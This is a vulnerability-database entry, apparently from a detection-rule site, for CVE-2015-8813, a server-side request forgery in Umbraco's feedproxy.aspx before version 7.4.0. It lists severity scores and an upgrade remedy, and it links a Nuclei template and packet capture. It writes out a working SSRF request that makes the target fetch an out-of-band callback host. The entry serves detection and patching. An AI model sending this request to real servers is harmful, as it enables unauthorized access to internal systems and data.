🔙 목록으로 돌아가기

CVE-2015-8813: Umbraco <7.4.0- Server-Side Request Forgery

TitleUmbraco <7.4.0- Server-Side Request Forgery
Authoremadshanab
SeverityHigh
ImpactThe vulnerability can result in unauthorized access to sensitive information or systems, leading to potential data breaches or further exploitation.
RemediationUpgrade Umbraco to version 7.4.0 or above to mitigate the vulnerability and apply any necessary patches or security updates.
CVSS Score8.2
EPSS Score0.83448
CVE IDCVE-2015-8813
CWE IDCWE-918
Tags cve2015 cve ssrf oast umbraco vkev vuln

🔍 Vulnerability Description

Umbraco before version 7.4.0 contains a server-side request forgery vulnerability in feedproxy.aspx that allows attackers to send arbitrary HTTP GET requests via http://local/Umbraco/feedproxy.aspx?url=http://127.0.0.1:80/index.

🌐 HTTP Request

GET /Umbraco/feedproxy.aspx?url=http://d5jqp6hle0o3ai3j5e9g161wnwq9g5y79.oast.site HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2015/CVE-2015-8813.yaml

🦈 Packet Capture: ⬇️ Download cve-2015-8813.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A